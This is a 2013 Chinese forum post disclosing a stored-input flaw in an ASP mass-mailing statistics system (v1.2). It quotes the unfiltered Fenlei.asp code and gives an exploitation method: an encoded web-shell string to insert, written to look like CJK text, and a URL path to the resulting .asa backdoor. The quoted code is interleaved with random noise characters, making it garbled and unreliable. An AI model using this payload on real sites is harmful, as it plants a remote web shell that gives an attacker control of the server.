找回密码
 立即注册
查看: 3026|回复: 0
打印 上一主题 下一主题

铜板儿网邮件群发统计系统 v1.2 漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-14 20:14:57 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
'Fenlei.asp
  C4 D+ M: n3 X! D) z' J8 R6 c# b2 w) ^" m! Q. E
IF Request.QueryString("Action")="del" Then
6 P% v* `9 n) _& j! W* pID=Request.QueryString("ID")
2 Q5 k5 I0 ~6 K8 A" {IF Countss ("tui","Fenlei",ID )<>0 then
6 D3 q5 d- p  F" i5 F'略 8 ?9 X- C, q( U0 g/ w8 B" B- K
IF Request.QueryString("Action")="Add" Then 2 Z6 R0 I4 J7 P
Tname=Request.Form("Typename") $ C# ~1 ?0 D6 \/ J3 o  }3 r& R4 |
Set Rs=Server.CreateObject("adodb.Recordset")
+ @2 `. s: _, l) i# vSql="Select * From Fenlei Order by id Desc " ( b. X; w9 b9 A/ f+ M
Rs.Open Sql,Conn,1,3 1 B( E" f2 I* F2 N
Rs.Addnew
; }' x2 n& v8 [0 g; mRs("Typename")=Tname
* R' M# u2 {9 I8 p; x! w0 n8 @2 q'略 , D! r, K) e) E7 A+ T
Set Rs=Server.CreateObject("adodb.Recordset") : e# p, ~6 J( ]+ x( o1 c+ X  H
Sql="Select * From Fenlei Order by id Desc "
- r9 K  B5 _' s/ t( x7 o( tRs.Open Sql,Conn,1,1 . v4 n+ a9 M/ S2 }
'略
' c8 O! p! g; {%>
4 Z+ V% K0 X# |% z- f4 g
. T5 U( }9 y) w   i% B$ C1 b5 \! r2 n+ J* [* O
! F3 T5 v( L: N9 x/ H
没有过滤,直接写入数据库。7 R1 Y; t! T" ^* c

) s9 `& w6 W; H6 O利用方法:+ a$ D6 o0 j# H" `* g3 C8 c8 A
8 g  O  V% J2 q% C
插入:┼攠數畣整爠煥敵瑳∨≡┩>8 C3 N, f# W$ I! l9 Y
% p' C" L% x4 W3 w

% y0 o. l5 D& s5 j( T9 d/ n/ R- l连接: http://www.xxx.com/###tongbaner.asa
1 s- g+ j+ h2 S'默认安装文件:
7 P+ K9 Z" i" b( q'install.asp: P4 s& G" S( w6 ~) E0 U% y! B  C" F
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表